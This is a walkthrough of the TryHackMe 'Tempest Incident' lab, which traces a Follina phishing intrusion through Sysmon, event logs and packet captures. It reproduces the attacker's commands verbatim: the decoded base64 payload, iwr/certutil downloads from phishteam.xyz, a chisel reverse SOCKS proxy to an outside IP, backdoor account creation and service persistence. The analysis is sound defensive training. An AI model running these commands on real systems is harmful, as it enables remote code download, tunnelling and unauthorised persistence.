TEMPEST

https://tryhackme.com/room/tempestincident

Walkthrough for "Tempest Incident"

Operating System: Windows

Username: user

Password: Investigatem3!

Log in: winconnect $TARGET user Investigatem3!

Command winconnect is my personal alias for the following:

xfreerdp /u:$2 /p:$3 /v:$1 /dynamic-resolution +clipboard

Tool Overview

Get hashes of artifacts by running PowerShell and executing the following command:

Get-FileHash -Algorithm SHA256 $ARTIFACT

SHA256 HASHES

capture.pcapng: CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6

sysmon.evtx: 665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F

windows.evtx: D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60

This challenge focuses on analyzing Sysmon Logs, Windows Event Logs, and Packet Captures. The following is a list of different tools for viewing the data:

Endpoint Log Tools

• EctxEcmd: CLI tool which parses Windows Event Logs into different formats

  • .\EvtxECmd.exe -f $FILE_PATH --csv $D_PATH --csvf $D_FILE

• Timeline Explorer: GUI tool that functions as a data filtering and navigating application

  • Open csv files produced by "EctxEcmd"

• SysmonView: Windows GUI to visualize Sysmon Logs

  • Uses xml files produced by "Event Viewer"

• Event Viewer: Windows GUI to view Windows Event Logs and Sysmon Logs

  • Action > Save All Events As... > XML

Network Logs

• Wireshark

• Brim

Tempest Incident - Initial Access

Malicious Document

The following is essential information generated by the CRITICAL alert caused by a malicious document:

• The malicious document has a .doc extension

• The user downloaded the malicious document via chrome.exe

• The malicious document then executed a chain of commands to attain code execution

Using the Timeline Explorer and searching for the string ".doc", 13 events are found relating to the malicious document. One in particular provides a large amount of information:

It's also possible to use SysmonView to interpret the events happening on processes like chrome.exe or WinWord.exe.

• Name of document: free_magicules.doc

• Name of machine: TEMPEST

• Name of user: benimaru

• PID of Microsoft Process: 496

A quick search on the capture.pcap in Wireshark also shows that the IP and website name are 167.71.199.191 and hxxp[://]phishteam[.]xyz (defanged form). Searching further, using the PID found (496) to search in Timeline Explorer, some interesting executable information is found:

This payload belongs to an exploit called [Folina](https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day), which leverages remote templates to execute a PowerShell payload using the "ms-msdt" MSProtocol URI scheme. A successful attack results in a remote, unauthenticated attacker taking control of an affected system.

Malicious Domain: 167.71.199.191

Malicious Payload: JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg

CVE: 2022-30190

Stage 2 Execution

Decoding the base64 from earlier gives the following:

$app=[Environment]::GetFolderPath('ApplicationData');
cd "$app\Microsoft\Windows\Start Menu\Programs\Startup";
iwr http://phishteam.xyz/02dcf07/update.zip -outfile update.zip;
Expand-Archive .\update.zip -DestinationPath .;
rm update.zip;

To get the full path, use the command gci env: to get the environment variables, specifically APPDATA. This is C:\Users\user\AppData\Roaming\, but for user Benimaru, the "user" would be replaced with "Benimaru". Combining the variable with the rest of path simplifies the path to C:\Users\Benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.zip. This can also be found by searching "update.zip" in the Timeline Explorer and looking at Payload Data4.

Full Target Path of the Payload:

C:\Users\Benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

The file is placed in the "Startup" folder. The Autostart execution reflects explorer.exe as its parent process ID, so child processes of explorer.exe within the event timeframe could be significant. Any process creation (Event ID 1) or File Creation (Event ID 11) succeeding the document execution are worth checking. Searching on Timeline Explorer for events relating to that parent process shows the following executable info:

Executed Command:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe

The file "first.exe" is likely the malicious binary for stage 2 execution. Searching for "first.exe" shows a number of commands run involving the file:

Investigating the payload of C:\Users\Public\Downloads\first.exe shows the hashes provided with the binaries.

SHA256 for first.exe: CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8

C2 Server: http://resolvecyber.xyz:80/

Malicious Document Traffic

The C2 server has the following information:

• IP and Port: 167.71.222.162:80

• DNS Query: resolvecyber.xyz

This information can help create the following filter to look at all the communication going to the C2, specifically the encoded requests: (ip.dst == 167.71.222.162 and ip.src == 192.168.254.107) and http

URL of Malicious Payload: http://phishteam.xyz/02dcf07/index.html

C2 Encoding: Base64

C2 Parameter: q

C2 URL Path: /9ab62b5

C2 HTTP Method: GET

C2 Programming Language: Nim

Discovery - Internal Reconnaissance

Going back to the C2 communication, I wanted to see what commands and responses were going through. The first step is to get the queries in one file. I used the following filter: (ip.dst == 167.71.222.162 and ip.src == 192.168.254.107) and http.request.uri contains "q". Then I exported packet dissections as plain text with only the packet summary line to quarantine the query line.

Using a simple python script, the decoded base64 strings could be extracted. The following is the script I wrote:

import base64

base64_list = []

# Isolates base64 in each summary line
with open("export.txt", "r") as f:
    for line in f.readlines():
        # Splits based on spaces to get parameter
        line = line.split()[7][11:]
        base64_list.append(line)

# Decodes base4 and outputs to file
with open("decoded.txt", "w") as f:
    for line in base64_list:
        decoded = base64.b64decode(line).decode("utf-8")
        f.write(decoded)

It can also be done easily in bash as well using sed and awk:

cat export.txt | awk '{print $8}' | sed 's/q=/ /g' | awk '{print $2}' | base64 -d

The following text file is the output which features the session the attacker had to create new users and persistence:

whoami - tempest\benimaru
pwd - 
Path               
----               
C:\Windows\system32


dir C:\Users - 

    Directory: C:\Users


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
d-----        6/20/2022   9:06 PM                benimaru                                                               
d-r---        6/20/2022   4:03 PM                Public                                                                 
d-----        6/20/2022  11:52 PM                rimuru                                                                 


net users - 
User accounts for \\TEMPEST

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed successfully.

net localgroup administrators - Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
rimuru
The command completed successfully.

net user benimaru - User name                    benimaru
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/20/2022 9:18:04 PM
Password expires             Never
Password changeable          6/20/2022 9:18:04 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   6/21/2022 1:14:49 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users                
Global Group memberships     *None                 
The command completed successfully.

dir C:\Users\benimaru - 

    Directory: C:\Users\benimaru


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
d-r---        6/20/2022   4:13 PM                3D Objects                                                             
d-r---        6/20/2022   4:13 PM                Contacts                                                               
d-r---        6/21/2022  12:27 AM                Desktop                                                                
d-r---        6/20/2022   9:20 PM                Documents                                                              
d-r---        6/21/2022   1:13 AM                Downloads                                                              
d-r---        6/20/2022   4:13 PM                Favorites                                                              
d-r---        6/20/2022   4:13 PM                Links                                                                  
d-r---        6/20/2022   4:13 PM                Music                                                                  
dar---        6/21/2022   1:15 AM                OneDrive                                                               
d-r---        6/20/2022   4:13 PM                Pictures                                                               
d-r---        6/20/2022   4:13 PM                Saved Games                                                            
d-r---        6/20/2022   4:13 PM                Searches                                                               
d-r---        6/20/2022   5:57 PM                Videos                                                                 


dir C:\Users\benimaru\documents - dir C:\users\benimaru\Desktop - 

    Directory: C:\users\benimaru\Desktop


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----        6/20/2022  11:34 PM            268 automation.ps1                                                         
-a----        6/20/2022   4:13 PM           1446 Microsoft Edge.lnk                                                     


cat C:\Users\Benimaru\Desktop\automation.ps1 - $user = "TEMPEST\benimaru"
$pass = "infernotempest"

$securePassword = ConvertTo-SecureString $pass -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword

## TODO: Automate easy tasks to hack working hours
netstat -ano -p tcp - 
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       864
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5508
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       4964
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       476
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1212
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1760
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2424
  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       624
  TCP    0.0.0.0:49676          0.0.0.0:0              LISTENING       608
  TCP    192.168.254.107:139    0.0.0.0:0              LISTENING       4
  TCP    192.168.254.107:51802  52.139.250.253:443     ESTABLISHED     3216
  TCP    192.168.254.107:51839  34.104.35.123:80       TIME_WAIT       0
  TCP    192.168.254.107:51858  104.101.22.128:80      TIME_WAIT       0
  TCP    192.168.254.107:51860  20.205.146.149:443     TIME_WAIT       0
  TCP    192.168.254.107:51861  204.79.197.200:443     ESTABLISHED     4352
  TCP    192.168.254.107:51871  20.190.144.169:443     TIME_WAIT       0
  TCP    192.168.254.107:51876  52.178.17.2:443        ESTABLISHED     4388
  TCP    192.168.254.107:51878  20.60.178.36:443       ESTABLISHED     4388
  TCP    192.168.254.107:51881  52.109.124.115:443     ESTABLISHED     4388
  TCP    192.168.254.107:51882  52.139.154.55:443      ESTABLISHED     4388
  TCP    192.168.254.107:51884  40.119.211.203:443     ESTABLISHED     4388
  TCP    192.168.254.107:51895  52.152.90.172:443      ESTABLISHED     5508
  TCP    192.168.254.107:51896  20.44.229.112:443      ESTABLISHED     8904
powershell iwr http://phishteam.xyz/02dcf07/ch.exe -outfile C:\Users\benimaru\Downloads\ch.exe - dir C:\Users\benimaru\Downloads\ch.exe - 

    Directory: C:\Users\benimaru\Downloads


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----        6/21/2022   1:17 AM        8230912 ch.exe                                                                 


whoami - nt authority\system
pwd - 
Path               
----               
C:\Windows\system32


net user shuna princess - net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed with one or more errors.

net user shuna - net user shuna pr1nc3ss! - net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed with one or more errors.

net user shion m4st3rch3f! - net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed with one or more errors.

net user Administrator ch4ng3dpassword! - The command completed successfully.

cmd.exe /c net user shion m4st3rch3f!!! - net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed with one or more errors.

whoami /priv - 
PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Isc.exe \\TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto - [SC] CreateService FAILED 1073:

The specified service already exists.

sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto - [SC] CreateService SUCCESS
sc.exe qc TempestUpdate2 - [SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TempestUpdate2
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\ProgramData\final.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : TempestUpdate2
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem
net user /add shuna princess - The command completed successfully.

net user /add shion m4st3rch3f! - The command completed successfully.

net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   shion                    
shuna                    WDAGUtilityAccount       
The command completed with one or more errors.

net localgroup administrators /add shion - The command completed successfully.

net localgroup administrators - Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
rimuru
shion
The command completed successfully.

Password Discovered: infernotempest

Listening Port Remote Shell: 5985 (WinRM)

After enumerating the listening ports, the attacker establishs a reverse socks proxy to access the internal services. The command they use first is powershell iwr http://phishteam.xyz/02dcf07/ch.exe which downloads a file called ch.exe. Searching this file in Timeline Explorer shows how the attacker used the process.

Doing a search of the hash on VirusTotal gives a return on the binary known as "chisel". Chisel is a fast tunnel transported over HTTP, secured via SSH. It's a single executable that works as both a client and server.

One of the following processes has the execution command: C:\Windows\system32\wsmprovhost.exe -Embedding. This is a process that hosts an active remote session on a target. It is a plugin for the host process WinRM. This was most likely the service used to authenticate to get privilege escalation.

Reverse Socks Proxy: "C:\Users\benimaru\Downloads\ch.exe" client 167.71.199.191:8080 R:socks

SHA256 Hash: 8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451

Name of Tool: chisel

Service used to Authenticate: winrm

Privilege Escalation

After looking at the privileges of the user, the attacker discovered a plethora of privilege escalation including the following privileges:

• SeImpersonatePrivilege

• SeTcbPrivilege

• SeCreateTokenPrivilege

• SeDebugPrivilege

• SeBackupPrivilege / SeRestorePrivilege

• SeTakeOwnershipPrivilege

All of these can be used to do local privilege escalation, but the logs show the attacker attempting to use "SeImpersonatePrivilege", which is one of the most explored local privilege escalation techniques often associated with "Juicy Potato", "Rogue Potato", and "PrintSpoofer".

Looking through the Sysmon events, there is an execution of spf.exe. This is a common associated executable name for "PrintSpoofer". Looking into the details shows us the following:

Binary Name: spf.exe

SHA256 Hash: 8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D

Associated Tool: printspoofer

Associated Privilege: SeImpersonatePrivilege

The base64 output also shows the use of another tool to establish a c2 connection: sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto

Searching for the sc.exe binary in the Sysmon events shows it was opened on port 8080.

Actions on the Objective

Most of the actions have already been shown by the output from the decoded base64. It shows a number of useful things for this section:

New Users Created: shion, shuna

Missing Option: /add

Command to add administrator:

net localgroup administrators /add shion

Persistence cmd: C:\Windows\system32\sc.exe \TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto